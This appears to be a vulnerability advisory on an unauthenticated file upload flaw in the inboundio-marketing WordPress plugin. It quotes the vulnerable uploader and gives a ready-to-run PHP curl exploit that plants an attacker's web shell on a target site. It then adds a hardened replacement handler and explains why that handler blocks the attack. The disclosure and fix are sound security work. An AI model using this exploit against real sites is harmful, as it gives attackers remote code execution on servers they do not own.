<ul><li>/admin/partials/csv_uploader.php<br></li></ul><pre class=""><?php
$ds = DIRECTORY_SEPARATOR;
$storeFolder = 'uploaded_csv';                                  // web-reachable folder next to this script
if (!empty($_FILES)) {
    // The only "sanitisation": strip characters outside [A-Za-z0-9 _.-] and turn whitespace into '_'.
    // The extension is never inspected, so "shell.php" stays "shell.php".
    $_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', '', $_FILES['file']['name']);
    $_FILES['file']['name'] = preg_replace('/\s+/', '_', $_FILES['file']['name']);
    $tempFile = $_FILES['file']['tmp_name'];
    $size = $_FILES['file']['size'];
    $targetPath = dirname( __FILE__ ) . $ds. $storeFolder . $ds;   // <plugin>/admin/partials/uploaded_csv/
    $targetFile = $targetPath. $_FILES['file']['name'];            // client-chosen name, any extension
    move_uploaded_file($tempFile,$targetFile);                     // no login, nonce or file-type check
    $path = "http://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
    echo dirname($path)."/uploaded_csv/".$_FILES['file']['name']." ".$size;   // echoes the URL of the stored file
}
?>
</pre><p>csv_uploader.php does no access control and no file-type check. The only processing is a character filter on the filename (everything except letters, digits, space, <code>_</code>, <code>.</code> and <code>-</code> is stripped, whitespace becomes <code>_</code>), which leaves a <code>.php</code> extension intact. Any unauthenticated visitor can therefore upload an arbitrary file into <code>uploaded_csv/</code> under the plugin directory, which the web server will execute, and the response even prints the URL of the stored file. The result is a direct getshell.<br></p><p>Exploit payload:</p><pre class=""><?php
// Upload a local web shell (k3dz.php, supplied by the attacker) to the vulnerable uploader.
// The "@file" syntax only works on PHP < 5.5 (or with CURLOPT_SAFE_UPLOAD disabled);
// on PHP 5.5+ curl needs a CURLFile object, so use it when available.
$postData = array();
$postData[ 'file' ] = class_exists('CURLFile') ? new CURLFile('k3dz.php') : "@k3dz.php"; #Shell_2_Exec ;)
$dz = curl_init();
curl_setopt($dz, CURLOPT_URL, "http://[Target]/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php");
curl_setopt($dz, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($dz, CURLOPT_POST, 1);
curl_setopt($dz, CURLOPT_POSTFIELDS, $postData );
curl_setopt($dz, CURLOPT_TIMEOUT, 0);
$buf = curl_exec ($dz);            // response body is the URL of the uploaded shell plus its size
curl_close($dz);
unset($dz);
echo $buf;
?>
</pre><p>Run:</p><pre class="">php payload.php</pre><p>The web shell is now in place at the URL echoed by the server.</p><p><img alt="1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" src="https://images.seebug.org/@/uploads/1434392185703-1434003617401-83D13E86-AA58-4DE3-B54D-258BEC77E21F.png" data-image-size="836,49"><br></p>
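<p>For comparison, a hardened replacement for the handler above, written for this page as an added example; it is not code from the inboundio-marketing plugin. It assumes it is loaded inside WordPress on PHP 7 or later, that the plugin's upload form carries a nonce action named <code>inboundio_csv_upload</code> (an assumption for this example), and uses a 5 MiB size cap chosen for illustration. It closes each hole in the original: direct access without a session, missing capability and CSRF checks, missing extension and content checks, client-controlled filenames, and storage inside the executable plugin directory.</p>

```php
<?php
// Hardened csv_uploader.php (added example, not the plugin's code).
// Assumes WordPress core is loaded: current_user_can, check_admin_referer,
// wp_upload_dir, wp_mkdir_p, trailingslashit, wp_json_encode, esc_html, wp_die.

// 1. The original file was reachable by anyone who knew its path.
if (!defined('ABSPATH')) {
    http_response_code(403);
    exit('Direct access not permitted.');
}

// 2. Capability + CSRF check: only an administrator who submitted the plugin's own form.
if (!current_user_can('manage_options')) {
    wp_die('Insufficient privileges.', '', array('response' => 403));
}
check_admin_referer('inboundio_csv_upload');   // nonce action name is an assumption

/**
 * Validate one $_FILES entry and return array(bool ok, string reason, ?string safe_name).
 * Pure PHP, so it can be exercised outside WordPress.
 */
function inboundio_validate_csv_upload(array $file)
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return array(false, 'upload error', null);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return array(false, 'not an uploaded file', null);
    }
    if ($file['size'] <= 0 || $file['size'] > 5 * 1024 * 1024) {   // 5 MiB cap (illustrative)
        return array(false, 'bad size', null);
    }
    // Allowlist on the LAST extension: "data.php.csv" is plain data, "shell.csv.php" is rejected.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if ($ext !== 'csv') {
        return array(false, 'only .csv accepted', null);
    }
    // Content check via libmagic: a CSV is text, so reject binaries and script-looking payloads.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!in_array($mime, array('text/plain', 'text/csv', 'text/x-csv', 'application/csv'), true)) {
        return array(false, "unexpected content type $mime", null);
    }
    // Never reuse the client-supplied name; the original echoed it straight into a URL.
    $safe = 'import-' . bin2hex(random_bytes(8)) . '.csv';
    return array(true, 'ok', $safe);
}

if (!empty($_FILES['file'])) {
    list($ok, $reason, $safe) = inboundio_validate_csv_upload($_FILES['file']);
    if (!$ok) {
        wp_die(esc_html("Rejected: $reason"), '', array('response' => 400));
    }
    // 3. Store under wp-content/uploads in a subfolder the web server is told not to serve,
    //    instead of the plugin directory where PHP files are executed.
    $upload = wp_upload_dir();
    $dir    = trailingslashit($upload['basedir']) . 'inboundio-csv';
    if (!wp_mkdir_p($dir)) {
        wp_die('Cannot create storage directory.', '', array('response' => 500));
    }
    file_put_contents($dir . '/.htaccess', "Require all denied\n");   // Apache 2.4 syntax; nginx needs a location block
    $dest = $dir . '/' . $safe;
    if (!move_uploaded_file($_FILES['file']['tmp_name'], $dest)) {
        wp_die('Move failed.', '', array('response' => 500));
    }
    // 4. Report only what the importer needs; no web-reachable URL is returned.
    header('Content-Type: application/json');
    echo wp_json_encode(array('stored' => $safe, 'bytes' => (int) $_FILES['file']['size']));
    exit;
}
```

<p>With this in place the payload above fails three times over: the POST without a WordPress session is refused by <code>current_user_can</code>, a request without a valid <code>_wpnonce</code> is refused by <code>check_admin_referer</code>, and <code>k3dz.php</code> fails the extension allowlist. Even a <code>.csv</code> that slips past the libmagic check lands in a directory the server never executes, under a name the attacker did not choose.</p>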